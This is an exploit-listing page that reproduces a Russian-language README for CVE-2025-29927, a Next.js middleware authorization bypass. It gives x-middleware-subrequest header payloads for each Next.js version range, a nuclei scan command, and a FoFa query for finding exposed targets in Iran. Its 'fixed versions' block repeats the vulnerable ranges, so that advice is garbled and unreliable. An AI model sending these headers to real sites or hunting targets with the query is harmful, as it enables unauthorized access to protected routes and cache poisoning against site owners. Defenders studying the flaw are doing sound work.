Sploitus

Exploit for CVE-2025-29927

kitploit Β· 2026-09-03

Exploit Code

MARKDOWN102 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KH4SH3I-CVE-2025-29927
#    
![](https://assets.kitploit.com/production/public/readmes/27998/e4e492b9cacbe5a40e7d7ff6ff4f488adaa9a2346f62b25a97c8e9e1738227e1.png)   
![](https://img.shields.io/badge/PRs-welcome-blue) ![](https://img.shields.io/github/last-commit/kh4sh3i/CVE-2025-29927) ![](https://img.shields.io/github/commit-activity/m/kh4sh3i/CVE-2025-29927) ![](https://img.shields.io/twitter/follow/kh4sh3i_?style=flat&logo=twitter) ![](https://img.shields.io/github/stars/kh4sh3i?style=flat&logo=github)

# CVE-2025-29927

CVE-2025-29927: ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ ΠΎΠ±Ρ…ΠΎΠ΄Π° middleware Π² Next.js Π­Ρ‚ΠΎΡ‚ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ дСмонстрируСт ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ CVE-2025-29927 Π² Next.js, Π³Π΄Π΅ Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½ΠΈΠΉ Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ x-middleware-subrequest ΠΌΠΎΠΆΠ΅Ρ‚ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ для ΠΎΠ±Ρ…ΠΎΠ΄Π° ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΎΠΊ middleware, Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ аутСнтификация.

![](https://assets.kitploit.com/production/public/readmes/27998/7e29728dfb487e768ea19913118b551d03482ec99d53225b5fc2dc4ec9b57fb2.jpg)

## Π—Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚Ρ‹Π΅ вСрсии

root@kitploit:~
    
    
    Next.js 15.x < 15.2.3
    Next.js 14.x < 14.2.25
    Next.js 13.x < 13.5.9
    

## БмягчСниС ΠΈ устранСниС уязвимости

  * ΠžΠ±Π½ΠΎΠ²ΠΈΡ‚Π΅ Next.js Π΄ΠΎ исправлСнных вСрсий:



root@kitploit:~
    
    
    Next.js 15.x < 15.2.3
    Next.js 14.x < 14.2.25
    Next.js 13.x < 13.5.9
    

  * Если Π½Π΅ΠΌΠ΅Π΄Π»Π΅Π½Π½ΠΎΠ΅ ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅ Π½Π΅Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, Π·Π°Π±Π»ΠΎΠΊΠΈΡ€ΡƒΠΉΡ‚Π΅ ΠΈΠ»ΠΈ ΡƒΠ΄Π°Π»ΠΈΡ‚Π΅ Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ x-middleware-subrequest Π½Π° ΡƒΡ€ΠΎΠ²Π½Π΅ Π²Π΅Π±-сСрвСра ΠΈΠ»ΠΈ прокси:



## Π‘Ρ†Π΅Π½Π°Ρ€ΠΈΠΈ воздСйствия

  * ΠžΠ±Ρ…ΠΎΠ΄ Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·Π°Ρ†ΠΈΠΈ: Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ доступ ΠΊ Π·Π°Ρ‰ΠΈΡ‰Ρ‘Π½Π½Ρ‹ΠΌ ΠΌΠ°Ρ€ΡˆΡ€ΡƒΡ‚Π°ΠΌ Π±Π΅Π· Π½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰Π΅ΠΉ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΈΠ»ΠΈ Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·Π°Ρ†ΠΈΠΈ.
  * ΠžΠ±Ρ…ΠΎΠ΄ Content Security Policy (CSP): Ссли Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΊΠΈ CSP Π΄ΠΎΠ±Π°Π²Π»ΡΡŽΡ‚ΡΡ Ρ‡Π΅Ρ€Π΅Π· middleware, Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΠΎΠ±ΠΎΠΉΡ‚ΠΈ эти срСдства контроля бСзопасности, Ρ‡Ρ‚ΠΎ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ позволяСт ΠΏΡ€ΠΎΠ²ΠΎΠ΄ΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ с мСТсайтовым скриптингом (XSS).
  * ΠžΡ‚ΠΊΠ°Π· Π² обслуТивании Ρ‡Π΅Ρ€Π΅Π· ΠΎΡ‚Ρ€Π°Π²Π»Π΅Π½ΠΈΠ΅ кэша: Π² ΠΎΠΏΡ€Π΅Π΄Π΅Π»Ρ‘Π½Π½Ρ‹Ρ… конфигурациях Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΠΎΡ‚Ρ€Π°Π²ΠΈΡ‚ΡŒ кэш нСсанкционированным содСрТимым, обходя middleware, ΡƒΡΡ‚Π°Π½Π°Π²Π»ΠΈΠ²Π°ΡŽΡ‰ΠΈΠΉ Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΊΠΈ управлСния кэшСм.



## ИспользованиС шаблона Nuclei nextjs-CVE-2025-29927

root@kitploit:~
    
    
    nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr
    

## Эксплуатация Π² Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… вСрсиях Next.js

  * Для вСрсий Π΄ΠΎ 12.2:



root@kitploit:~
    
    
    x-middleware-subrequest: pages/_middleware
    x-middleware-subrequest: pages/dashboard/_middleware
    x-middleware-subrequest: pages/dashboard/panel/_middleware
    

  * Для вСрсий 12.2 ΠΈ Π½ΠΎΠ²Π΅Π΅:



root@kitploit:~
    
    
    x-middleware-subrequest: middleware
    x-middleware-subrequest: src/middleware
    

  * Для вСрсий 13.2.0 ΠΈ Π½ΠΎΠ²Π΅Π΅:



root@kitploit:~
    
    
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

## Поиск Ρ†Π΅Π»Π΅ΠΉ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ FoFa

root@kitploit:~
    
    
    header="x-middleware-rewrite" && country="IR"
    

### бСсплатный CTF для этого

  * CTF